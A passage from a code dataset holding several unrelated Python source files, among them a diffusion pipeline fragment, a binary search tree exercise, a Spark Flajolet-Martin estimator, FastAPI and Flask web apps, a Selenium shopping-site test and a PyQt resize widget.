matrix[img_where_color] = 1\n if not img_where_color.sum() > 0:\n print(\n f'Warning : not a single color {color} not found in image')\n\n img_where_color_init = torch.where(\n torch.tensor(img_where_color, dtype=torch.bool), weight_active,\n neg)\n\n img_where_color = torch.where(\n torch.from_numpy(matrix == 1) & (img_where_color_init == 0.0),\n torch.tensor(neg), img_where_color_init)\n\n ret_lists.append((v_as_tokens, img_where_color))\n else:\n w, h = 768, 768\n\n if len(ret_lists) == 0:\n ret_lists.append(([-1], torch.zeros((w, h), dtype=torch.float32)))\n return ret_lists, w, h\n\n\ndef _extract_cross_attention(tokenizer, device, color_map_image, color_context,\n text_input, neg):\n # Process color map image and context\n seperated_word_contexts, width, height = _image_context_seperator(\n color_map_image, color_context, tokenizer, neg)\n\n # Compute cross-attention weights\n cross_attention_weight_1 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=1,\n original_shape=True).to(device)\n cross_attention_weight_8 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=8).to(device)\n cross_attention_weight_16 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=16).to(device)\n cross_attention_weight_32 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=32).to(device)\n cross_attention_weight_64 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=64).to(device)\n\n hidden_states = {\n 'CA_WEIGHT_ORIG': cross_attention_weight_1, # 768 x 768\n 'CA_WEIGHT_9216': cross_attention_weight_8, # 96 x 96\n 'CA_WEIGHT_2304': cross_attention_weight_16, # 48 x 48\n 'CA_WEIGHT_576': cross_attention_weight_32, # 24 x 24\n 'CA_WEIGHT_144': cross_attention_weight_64, # 12 x 12\n }\n\n uncond_hidden_states = {\n 'CA_WEIGHT_ORIG': 0,\n 'CA_WEIGHT_9216': 0,\n 'CA_WEIGHT_2304': 0,\n 'CA_WEIGHT_576': 0,\n 'CA_WEIGHT_144': 0,\n }\n\n return hidden_states, uncond_hidden_states\n\n\ndef _downsampling(img: torch.tensor, w: int, h: int) -> torch.tensor:\n return F.interpolate(\n img.unsqueeze(0).unsqueeze(1),\n size=(w, h),\n mode='bilinear',\n align_corners=True,\n ).squeeze()\n\n\ndef _latents_to_images(vae, latents, scale_factor=0.18215):\n \"\"\"Decode latents to PIL images.\"\"\"\n scaled_latents = 1.0 / scale_factor * latents.clone()\n images = vae.decode(scaled_latents).sample\n images = (images / 2 + 0.5).clamp(0, 1)\n images = images.detach().cpu().permute(0, 2, 3, 1).numpy()\n\n if images.ndim == 3:\n images = images[None, ...]\n images = (images * 255).round().astype('uint8')\n pil_images = [Image.fromarray(image) for image in images]\n\n return pil_images\n\n\ndef _sanitize_parameters(self, **pipeline_parameters):\n \"\"\"\n this method should sanitize the keyword args to preprocessor params,\n forward params and postprocess params on '__call__' or '_process_single' method\n\n Returns:\n Dict[str, str]: preprocess_params = {'image_resolution': self.model.get_resolution()}\n Dict[str, str]: forward_params = pipeline_parameters\n Dict[str, str]: postprocess_params = {}\n \"\"\"\n pipeline_parameters['image_resolution'] = self.model.get_resolution()\n pipeline_parameters['modelsetting'] = self.model.get_config()\n pipeline_parameters['model_dir'] = self.model.get_model_dir()\n pipeline_parameters['control_type'] = self.init_control_type\n pipeline_parameters['device'] = self.device\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/cone2_pipeline/cones2_inference_pipeline.py","file_name":"cones2_inference_pipeline.py","file_ext":"py","file_size_in_byte":18735,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"12989041603","text":"\"\"\"\nGiven a Tree class, create a method called add that accepts a Node, and inserts it into a tree such that the tree continues to be a Binary Search Tree. The method should return nothing.\n\nA Binary Search Tree is a tree where every node has values greater than its data on the right-hand side, and values less than its data on the left-hand side, and all of the sub-tree nodes follow suit. Here's an example:\n\"\"\"\nimport sys\nsys.setrecursionlimit(1000)\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\nclass Tree:\n def __init__(self):\n self.root = None\n\n def print_bfs(self):\n if not self.root:\n return\n\n queue = [self.root]\n\n while len(queue) > 0:\n current_node = queue.pop(0)\n print(current_node.data)\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n\n def in_order_traversal(self):\n nodes = []\n\n def dfs(node):\n if node:\n\n dfs(node.left)\n nodes.append(node.data)\n dfs(node.right)\n\n dfs(self.root)\n return nodes\n\n def add(self, node):\n if not self.root:\n self.root = node\n return\n\n def insert(root, node):\n\n if root.data > node.data:\n if root.left is None:\n root.left = node\n else:\n insert(root.left, node)\n else:\n\n if root.right is None:\n root.right = node\n else:\n insert(root.right, node)\n\n insert(self.root, node)\n","repo_name":"makhmudislamov/cti_ips_2020","sub_path":"mod12_trees/insert_node.py","file_name":"insert_node.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20367162844","text":"import random\nimport binascii\nfrom statistics import mean,median\nfrom datetime import datetime\nimport findspark\nfindspark.init()\nfindspark.find()\nimport pyspark\nimport random\nimport json\nimport sys\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\n\ndef Prime_check(num):\n if num<=1:\n return False\n if num<=3:\n return True\n if num%2==0 or num%3==0:\n return False\n k = 5\n while k*k <= num:\n if (num%k == 0 or num%(k+2)==0):\n return False\n k=k + 6\n return True\n\n\n\ndef hasNumbers(inputString):\n for char in inputString:\n if char.isdigit() or inputString=='':\n return True\n if inputString=='':\n return True\n else:\n return False\n \n\n\ndef hashed_values2(hashfunction,conv_value,m):\n calc=((((hashfunction[0]*conv_value)+hashfunction[1])%hashfunction[2])%m)\n return calc\n\n\nhash_count=9\nrandom.seed(9001)\na = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1)\nb = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1) \ngenerated_prime = random.choices([x for x in range(1000000000, 1000000100) if Prime_check(x)],k=hash_count+1)\nhashed_list=[]\nfor points in zip(a,b,generated_prime):\n hashed_list.append([points[0],points[1],points[2]])\n \n\n\ndef Flajolet_Martin(stream):\n sizeGroup=3\n numHashes=9\n city_list=stream.collect()\n #print(len(city_list))\n m=2**(numHashes)\n true_value=len(set(city_list))\n #print(true_value)\n global hashed_list\n global outputFile\n \n L=[]\n for hashes in hashed_list:\n max_value=-1\n for cities in city_list:\n v=hasNumbers(cities)\n if v:\n pass\n else:\n hashing=int(binascii.hexlify(cities.encode('utf8')), 16)\n #print(hashing)\n hashed_value=hashed_values2(hashes,hashing,m)\n #print(hashed_value)\n #print(hashed_value)\n hashed_value=bin(hashed_value)[2:]\n length=len(hashed_value)-len(hashed_value.rstrip('0'))\n if (length > max_value):\n max_value = length\n #tail_zero.append(length)\n #max_value=max(tail_zero)\n L.append(2**max_value) \n Index_start=0\n groupAvgs=[] \n for end_Index in range(sizeGroup, numHashes, sizeGroup):\n groupAvgs.append(mean(L[Index_start:end_Index]))\n Index_start=end_Index\n estimated_value=median(groupAvgs)\n current_timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n out = str(current_timestamp) + \",\" + str(true_value) + \",\" + str(estimated_value) + \"\\n\"\n outputFile.write(out)\n outputFile.flush()\n return\n\n\n\nif __name__ == \"__main__\":\n print('Mohan')\n port=int(sys.argv[1])\n output_file_path=sys.argv[2]\n\n batch_size=5 \n \n\n sc = SparkContext('local[*]','test')\n sc.setLogLevel(\"OFF\")\n ssc = StreamingContext(sc, batch_size)\n dataRDD = ssc.socketTextStream(\"localhost\", port)\n\n\n outputFile = open(output_file_path, \"w\", encoding=\"utf-8\")\n out=\"Time,Ground Truth,Estimation\"+\"\\n\"\n outputFile.write(out)\n\n \n business_rdd=dataRDD.map(lambda x:json.loads(x))\n city_rdd=business_rdd.map(lambda x:x['city'])\n city_list=city_rdd.window(30, 10).foreachRDD(Flajolet_Martin)\n \n \n ssc.start()\n ssc.awaitTermination()\n\n\n\n","repo_name":"thotamohan/Spark-streaming","sub_path":"FlajoletMartin.py","file_name":"FlajoletMartin.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"34279681447","text":"import datetime\nimport utils\nimport threading\nimport uuid\n\nclass Config:\n DEFAULT_CONFIG_SELF = {}\n\n DEFAULT_CONFIG = {\n 'settings': lambda: {},\n 'timestamp': lambda: datetime.datetime.now()\n }\n\n def __init__(self, config=None):\n self.run_default_config() # Always run this first\n self.logger = utils.setup_logger(self, 'DEBUG') # Always run this second\n\n if config:\n self.run_config(config) # Run the config if it exists\n\n def run_default_config(self):\n for key, default_value_func in self.DEFAULT_CONFIG_SELF.items():\n setattr(self, key, default_value_func(self))\n for key, default_value_func in self.DEFAULT_CONFIG.items():\n setattr(self, key, default_value_func())\n\n def run_config(self, config):\n for key, value in config.items():\n if hasattr(self, key) and not key.startswith('_'): # Skip these attributes\n setattr(self, key, value)\n self.logger.info(f\"Updated config for {self.__class__.__name__} with {config}\")\n\n # ... rest of your code ...\n\n def update(self, updates):\n if not isinstance(updates, dict):\n raise TypeError('updates should be a dictionary')\n self.settings.update(updates)\n self.timestamp = datetime.datetime.now()\n\n\n def __getitem__(self, key):\n try:\n return self.settings[key]\n except KeyError:\n raise KeyError(f'The key \"{key}\" does not exist in the configuration settings.')\n\n def get(self, key, default=None):\n return self.settings.get(key, default)\n\n def __contains__(self, key):\n return key in self.settings\n\n def __repr__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n def __str__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n\nclass DefaultBotConfig:\n REQUIRED_KEYS = ['id', 'inventory', 'logger', 'lock', 'port', 'state', 'memory', 'brain']\n DEFAULT_CONFIG = {\n 'id': lambda: str(uuid.uuid4()),\n 'inventory': lambda: {'items': []},\n 'lock': lambda: threading.Lock(),\n '_created_at': lambda: datetime.datetime.now(),\n '_updated_at': lambda: datetime.datetime.now(),\n '_parent': lambda: None,\n '_logger_level': 'DEBUG',\n '_restricted_config_keys': lambda: {'id', 'port', 'state', 'memory', 'logger', 'lock'},\n 'is_thinking': False,\n 'is_updating': False,\n 'is_active': True,\n 'has_controller': False,\n }\n\n def __init__(self, custom_config=None):\n self.config = self.DEFAULT_CONFIG.copy()\n if custom_config:\n self.config.update(custom_config)\n self._verify_config()\n\n def _verify_config(self):\n for key in self.REQUIRED_KEYS:\n if key not in self.config:\n raise ValueError(f\"Missing required config key: {key}\")\n\n","repo_name":"ctavolazzi/winfobot","sub_path":"digital_highway/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"32656331189","text":"from django.urls import path\n\nfrom . views import RoomList,BookingListView, RoomDetailView, cancelBookingview\n\napp_name='hotelapp'\n\nurlpatterns = [\n path('room_list/', RoomList, name='RoomList'),\n path('booking_list/', BookingListView.as_view(), name='BookingListView'),\n path('room/', RoomDetailView.as_view(), name='RoomDetailView'),\n path('booking/cancel/', cancelBookingview.as_view(), name='cancelBookingview'),\n \n]\n\n","repo_name":"ManvithaSukhavasi/room_booking","sub_path":"hotel/hotelapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"4942014205","text":"import fastapi_users\nfrom fastapi import FastAPI\nfrom starlette.requests import Request\n\nfrom config import SECRET_KEY\nfrom core.db import database\nfrom core.fast_users import fastusers\nfrom task_app.routes import tasks_router\nfrom user_auth.jwt_config import jwt_authentication \nfrom user_auth.schemas import User\n\n\napp = FastAPI()\napp.include_router(\n fastusers.get_auth_router(jwt_authentication),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_register_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_reset_password_router(SECRET_KEY),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_users_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(tasks_router, prefix=\"/tasks\", tags=[\"tasks\"])\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n# @fastusers.on_after_register()\n# def on_after_register(user: User, request: Request):\n# print(f\"User {user.id} has registered.\")\n\n\n# @fastusers.on_after_forgot_password()\n# def on_after_forgot_password(user: User, token: str, request: Request):\n# print(f\"User {user.id} has forgot their password. Reset token: {token}\")\n\n\n","repo_name":"StepanovSerjant/TestAppvelox","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70171785610","text":"from PIL import ImageGrab, ImageDraw\nimport scree_lib.eink as eink\n\nim = ImageGrab.grab(bbox=(0,0,800,480))\n\nepd = eink.EPD()\n\nepd.init()\nepd.Clear()\nepd.display(epd.getbuffer(im))\nepd.sleep()","repo_name":"firewallfail/eink-weather","sub_path":"update_screen.py","file_name":"update_screen.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40708047258","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.ui import Select\nfrom time import sleep\n\n\nclass TestingMercadoLibre(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n s = Service('../chromedriver')\n cls.driver = webdriver.Chrome(service=s)\n driver = cls.driver\n driver.get(\"http://www.mercadolibre.com/\")\n driver.maximize_window()\n\n def test_serch_ps4(self):\n items = {}\n driver = self.driver\n country = driver.find_element(By.ID, 'CO')\n country.click()\n search_field = driver.find_element(By.NAME, 'as_word')\n search_field.click()\n search_field.clear()\n search_field.send_keys('playstation 4')\n search_field.submit()\n\n location = driver.find_element(By.XPATH, '//*[@id=\"root-app\"]/div/div/aside/section/div[6]/ul/li[1]/a/span[1]')\n driver.execute_script(\"arguments[0].click()\", location)\n sleep(3)\n\n codition = driver.find_element(By.PARTIAL_LINK_TEXT, 'Nuevo')\n codition.click()\n sleep(3)\n\n order_menu = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > button > span')\n order_menu.click()\n higher_price = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > div > ul > a:nth-child(3)')\n higher_price.click()\n sleep(3)\n\n for i in range(5):\n article_name = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[1]/a/h2').text\n article_price = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[2]/div[1]/div[1]/div/div/div/span[1]/span[2]/span[2]').text\n items[article_name] = article_price\n print(items)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"JavierLGZ/selenium-platzi","sub_path":"prueba_tecnica/mercadolibre.py","file_name":"mercadolibre.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36040003994","text":"from flask import Flask,render_template,request \r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom flask import Flask, render_template, request, jsonify\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom flask import Flask, render_template, request, jsonify\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nmodel = tf.keras.models.load_model('my_model.h5')\r\napp = Flask(__name__)\r\ndef load_data(data):\r\n df= pd.read_csv(data, sep= ';', error_bad_lines= False, encoding= 'latin-1')\r\n df=df.head(500)\r\n return df\r\n\r\ndef search_term_if_not_found(term,df):\r\n term = term.capitalize()\r\n result_df= df[df['Book-Title'].str.contains(term)]\r\n return result_df['Book-Title'].iloc[0] \r\n\r\ndef vectorize_text_to_cosine_max(data):\r\n count_vec= CountVectorizer()\r\n cv_mat= count_vec.fit_transform(data)\r\n cosine_sim=cosine_similarity(cv_mat)\r\n return cosine_sim\r\n# \r\ndef get_recommendation(title,cosine_sim_mat,df,num_of_rec=8):\r\n course_indices=pd.Series(df.index,index=df['Book-Title']).drop_duplicates()\r\n idx=course_indices[title]\r\n sim_scores=list(enumerate(cosine_sim_mat[idx]))\r\n sim_scores= sorted(sim_scores,key=lambda x:x[1],reverse=True)\r\n selected_course_indices=[i[0] for i in sim_scores[1:]]\r\n selected_course_score=[i[0] for i in sim_scores[1:]]\r\n result_df= df.iloc[selected_course_indices] \r\n result_df['similarity score']=selected_course_score\r\n final_recommeded= result_df[['Book-Title','Book-Author','Year-Of-Publication','similarity score','Image-URL-L']]\r\n return final_recommeded.head(num_of_rec)\r\ndf=load_data('https://raw.githubusercontent.com/tttgm/fellowshipai/master/book_crossing_dataset/BX-Books.csv')\r\ncosine_sim_mat=vectorize_text_to_cosine_max(df['Book-Title'])\r\ndef get_suggestions():\r\n data = pd.read_csv(\"https://raw.githubusercontent.com/sahilpocker/Book-Recommender-System/master/Dataset/books.csv\")\r\n return list(data['title'].str.capitalize())\r\n@app.route('/')\r\ndef login():\r\n return render_template(\"login.html\")\r\ndatabase={'diane':'123','james':'aac','karthik':'asdsf'}\r\n\r\n@app.route('/form_login',methods=['POST','GET'])\r\ndef login_page():\r\n df=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/most_rated_books_summary_noerros.csv')\r\n titles = df['book_title']\r\n authors=df['book_author']\r\n years=df['year_of_publication']\r\n # scores=df['similarity score']\r\n images = df['image_url_l']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/books_summary_noerros.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n years_rating=df_rating['year_of_publication']\r\n images_rating = df_rating['image_url_l']\r\n name1=request.form['username']\r\n sytem=request.form['sytem']\r\n pwd=request.form['password']\r\n # COLLABORATIVE\r\n df= pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n coll_titles = df['book_title']\r\n coll_authors=df['book_author']\r\n coll_years=df['year_of_publication']\r\n coll_images= df['image_url_l']\r\n\r\n if name1 not in database:\r\n return render_template('login.html',info='Invalid User')\r\n else:\r\n if database[name1]!=pwd:\r\n return render_template('login.html',info='Invalid Password')\r\n else:\r\n if sytem ==\"content based\":\r\n return render_template('content.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n elif sytem == \"collaborative based\":\r\n return render_template('collaborative.html',coll_images=coll_images,coll_years=coll_years,coll_titles=coll_titles,coll_authors=coll_authors,name=name1,title = titles,author=authors,year = years,image=images,titles_rating=titles_rating,authors_rating=authors_rating,years_rating=years_rating,images_rating=images_rating)\r\n\r\n@app.route('/predict', methods = ['POST']) # /result route Ratingsreviews\r\ndef predict():\r\n name = request.form['book_name']\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n df_rating=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/mostrated.csv')\r\n titles_rating = df_rating['book_title']\r\n authors_rating=df_rating['book_author']\r\n # years=df['year_of_publication']\r\n scores_rating=df_rating['ratings']\r\n images_rating = df_rating['image_url_l']\r\n if name is not None:\r\n try :\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n except:\r\n name= search_term_if_not_found(name,df)\r\n searchdf = df[df['Book-Title']== name]\r\n searchtitles = searchdf['Book-Title']\r\n searchauthors= searchdf['Book-Author']\r\n searchyears= searchdf['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n searchimages = searchdf['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n # scores=result['similarity score']\r\n images = result['Image-URL-L']\r\n suggestions= get_suggestions()\r\n return render_template('Recommender.html',titles_rating=titles_rating,authors_rating=authors_rating, scores_rating=scores_rating,images_rating=images_rating,title = titles,author=authors,year = years,image=images,suggestions=suggestions,searchtitles=searchtitles,searchauthors=searchauthors,searchyears=searchyears,searchimages=searchimages)\r\n@app.route('/content/', methods=['GET'])\r\ndef book_content_recommend(title):\r\n name = str(title)\r\n if name is not None:\r\n books_searched=df[df['Book-Title']==name]\r\n searched_title = books_searched['Book-Title']\r\n searched_author= books_searched['Book-Author']\r\n searched_years= books_searched['Year-Of-Publication']\r\n searched_images= books_searched['Image-URL-L']\r\n result= get_recommendation(name,cosine_sim_mat,df,8)\r\n titles = result['Book-Title']\r\n authors=result['Book-Author']\r\n years=result['Year-Of-Publication']\r\n images = result['Image-URL-L']\r\n return render_template('content_result.html',searched_years=searched_years,searched_images=searched_images,searched_title=searched_title,searched_author=searched_author,title = titles,author=authors,year = years,images=images)\r\n\r\n@app.route('/book/', methods=['GET'])\r\ndef book_collaborative_recommend(coll_titles):\r\n name = str(coll_titles)\r\n combine_book_rating_data=pd.read_csv('https://raw.githubusercontent.com/Diane10/movies/main/Finalcollab.csv')\r\n books_df_s=combine_book_rating_data[combine_book_rating_data['book_title']==name]\r\n titles_searched = books_df_s['book_title']\r\n authors_searched=books_df_s['book_author']\r\n year_searched = books_df_s['year_of_publication']\r\n images_searched = books_df_s['image_url_l']\r\n user_id = books_df_s['user']\r\n user_id=user_id.iloc[0]\r\n user_r = user_id\r\n b_id =list(combine_book_rating_data.user.unique())\r\n book_arr = np.array(b_id) #get all book IDs\r\n user = np.array([user_r for i in range(len(b_id))])\r\n pred = model.predict([book_arr, user])\r\n pred = pred.reshape(-1) #reshape to single dimension\r\n pred_ids = (-pred).argsort()[0:10]\r\n top10 = combine_book_rating_data.iloc[pred_ids]\r\n f=['book_title','book_author','year_of_publication','image_url_l']\r\n displ=(top10[f])\r\n c_title = displ['book_title']\r\n c_authors = displ['book_author']\r\n c_small_image_url= displ['image_url_l']\r\n c_years= displ['year_of_publication']\r\n return render_template('result.html',year_searched=year_searched,c_years=c_years,images_searched=images_searched,authors_searched=authors_searched,titles_searched=titles_searched,c_title=c_title,c_authors=c_authors,c_small_image_url=c_small_image_url)\r\nif __name__ == '__main__':\r\n app.run(debug=True,use_reloader=False)\r\n","repo_name":"Diane10/Book_Recommender_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37866306958","text":"from PyQt5.QtCore import (\n Qt,\n QSize,\n QRect,\n pyqtSignal,\n QPoint\n)\nfrom PyQt5.QtGui import (\n QPen,\n QPainter\n)\nfrom PyQt5.QtWidgets import (\n QWidget\n)\n##\n# A special widget designed as an aid for resizing a canvas. Based on a\n# similar widget used by the GIMP.\n##\nclass ResizeHelper(QWidget):\n offsetChanged = pyqtSignal(QPoint)\n offsetXChanged = pyqtSignal(int)\n offsetYChanged = pyqtSignal(int)\n offsetBoundsChanged = pyqtSignal(QRect)\n\n def __init__(self, parent = None):\n super().__init__(parent)\n \n self.mMouseAnchorPoint = QPoint()\n self.mOffset = QPoint()\n self.mOldSize = QSize()\n self.mDragging = False\n self.mOffsetBounds = QRect()\n self.mScale = 0.0\n self.mNewSize = QSize()\n self.mOrigOffset = QPoint()\n \n self.setMinimumSize(20, 20)\n self.setOldSize(QSize(1, 1))\n\n def oldSize(self):\n return self.mOldSize\n\n def newSize(self):\n return self.mNewSize\n\n def offset(self):\n return self.mOffset\n\n def offsetBounds(self):\n return self.mOffsetBounds\n\n def setOldSize(self, size):\n self.mOldSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setNewSize(self, size):\n self.mNewSize = size\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def setOffset(self, offset):\n # Clamp the offset within the offset bounds\n newOffset = QPoint(min(self.mOffsetBounds.right(),\n max(self.mOffsetBounds.left(), offset.x())),\n min(self.mOffsetBounds.bottom(),\n max(self.mOffsetBounds.top(), offset.y())))\n if (self.mOffset != newOffset):\n xChanged = self.mOffset.x() != newOffset.x()\n yChanged = self.mOffset.y() != newOffset.y()\n self.mOffset = newOffset\n if (xChanged):\n self.offsetXChanged.emit(self.mOffset.x())\n if (yChanged):\n self.offsetYChanged.emit(self.mOffset.y())\n self.offsetChanged.emit(self.mOffset)\n self.update()\n\n ## Method to set only the X offset, provided for convenience. */\n def setOffsetX(self, x):\n self.setOffset(QPoint(x, self.mOffset.y()))\n\n ## Method to set only the Y offset, provided for convenience. */\n def setOffsetY(self, y):\n self.setOffset(QPoint(self.mOffset.x(), y))\n\n ## Method to set only new width, provided for convenience. */\n def setNewWidth(self, width):\n self.mNewSize.setWidth(width)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n ## Method to set only new height, provided for convenience. */\n def setNewHeight(self, height):\n self.mNewSize.setHeight(height)\n self.recalculateMinMaxOffset()\n self.recalculateScale()\n\n def paintEvent(self, event):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n origX = (_size.width() - self.mNewSize.width() * self.mScale) / 2 + 0.5\n origY = (_size.height() - self.mNewSize.height() * self.mScale) / 2 + 0.5\n oldRect = QRect(self.mOffset, self.mOldSize)\n painter = QPainter(self)\n painter.translate(origX, origY)\n painter.scale(self.mScale, self.mScale)\n pen = QPen(Qt.black)\n pen.setCosmetic(True)\n painter.setPen(pen)\n painter.drawRect(QRect(QPoint(0, 0), self.mNewSize))\n pen.setColor(Qt.white)\n painter.setPen(pen)\n painter.setBrush(Qt.white)\n painter.setOpacity(0.5)\n painter.drawRect(oldRect)\n pen.setColor(Qt.black)\n pen.setStyle(Qt.DashLine)\n painter.setOpacity(1.0)\n painter.setBrush(Qt.NoBrush)\n painter.setPen(pen)\n painter.drawRect(oldRect)\n painter.end()\n\n def mousePressEvent(self, event):\n self.mMouseAnchorPoint = event.pos()\n self.mOrigOffset = self.mOffset\n self.mDragging = event.button() == Qt.LeftButton\n\n def mouseMoveEvent(self, event):\n if (not self.mDragging):\n return\n pos = event.pos()\n if (pos != self.mMouseAnchorPoint):\n self.setOffset(self.mOrigOffset + (pos - self.mMouseAnchorPoint) / self.mScale)\n self.offsetChanged.emit(self.mOffset)\n\n def resizeEvent(self, event):\n self.recalculateScale()\n\n def recalculateScale(self):\n _size = self.size() - QSize(2, 2)\n if (_size.isEmpty()):\n return\n if self.mOldSize.width() < self.mNewSize.width():\n width = self.mNewSize.width()\n else:\n width = 2 * self.mOldSize.width() - self.mNewSize.width()\n if self.mOldSize.height() < self.mNewSize.height():\n height = self.mNewSize.height()\n else:\n height = 2 * self.mOldSize.height() - self.mNewSize.height()\n\n # Pick the smallest scale\n scaleW = _size.width() / width\n scaleH = _size.height() / height\n if scaleW < scaleH:\n self.mScale = scaleW\n else:\n self.mScale = scaleH\n\n self.update()\n\n def recalculateMinMaxOffset(self):\n offsetBounds = self.mOffsetBounds\n if (self.mOldSize.width() <= self.mNewSize.width()):\n offsetBounds.setLeft(0)\n offsetBounds.setRight(self.mNewSize.width() - self.mOldSize.width())\n else:\n offsetBounds.setLeft(self.mNewSize.width() - self.mOldSize.width())\n offsetBounds.setRight(0)\n\n if (self.mOldSize.height() <= self.mNewSize.height()):\n offsetBounds.setTop(0)\n offsetBounds.setBottom(self.mNewSize.height() - self.mOldSize.height())\n else:\n offsetBounds.setTop(self.mNewSize.height() - self.mOldSize.height())\n offsetBounds.setBottom(0)\n\n if (self.mOffsetBounds != offsetBounds):\n self.mOffsetBounds = offsetBounds\n self.offsetBoundsChanged.emit(self.mOffsetBounds)\n","repo_name":"theall/Python-Tiled","sub_path":"src/tiled/resizehelper.py","file_name":"resizehelper.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
